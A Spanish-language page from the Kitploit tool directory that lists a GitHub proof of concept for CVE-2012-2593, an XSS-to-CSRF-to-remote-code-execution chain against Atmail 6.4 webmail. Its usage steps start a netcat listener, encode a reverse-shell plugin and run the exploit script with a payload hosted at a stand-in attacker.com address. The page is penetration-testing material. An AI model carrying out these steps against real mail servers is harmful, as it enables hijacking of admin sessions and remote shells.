Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2012-2593 — Cadena de Explotación Atmail XSS-CSRF-RCE | Kitploit
Herramientas/GitHubGitHub/andrewtrube/cve-2012-2593
Frameworks de ExploitsGeneración de PayloadsExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Cadena de Explotación Atmail XSS-CSRF-RCE

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Cadena de Explotación XSS-CSRF-RCE en Atmail PoC

atmail-rce.py: Explota CVE-2012-2593 en la interfaz de webmail de Atmail.

atmail-csrf.js: Archivo Javascript que aprovecha CVE 2012-2593 para convertirlo en un CSRF e instalar un plugin malicioso que ejecuta una reverse shell.

Plugin.php: Plugin de Atmail a instalar que ejecuta una reverse shell

!!Usar solo contra servidores en los que tengas permiso para probar

Resumen

El servidor de correo Atmail versión 6.4 tiene una vulnerabilidad XSS tanto en el encabezado de correo Date como en el Cuerpo del correo (mediante inyección de iFrame). Esto se aprovecha para convertirlo en un CSRF usando la API XHR de javascript para enviar una solicitud con la cookie del usuario administrador al panel de administración, instalando un plugin malicioso que ejecuta código para una reverse shell.

Prueba de Concepto

  1. Inicia un listener de netcat nc -lvp 4444
  2. Abre Plugin.php y cambia la dirección IP y el Puerto a los de tu listener de netcat
  3. Comprime Plugin con gzip y codifícalo en base64 gzip -c Plugin.php | base64 | tr -d [:space:]
  4. Copia y pega la salida anterior en la variable data de atmail-csrf.js
  5. Ejecuta el script atmail-rce.py python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. Espera hasta que el usuario administrador inicie sesión en su correo

Advertencias

  • Solo funciona si el objetivo del XSS es un usuario administrador de Atmail
  • Solo funciona si el objetivo ha iniciado sesión tanto en la interfaz de webmail como en la interfaz de administración del servidor
  • Solo funciona si la instalación de plugins está permitida en el servidor (activada por defecto)
Descargar herramienta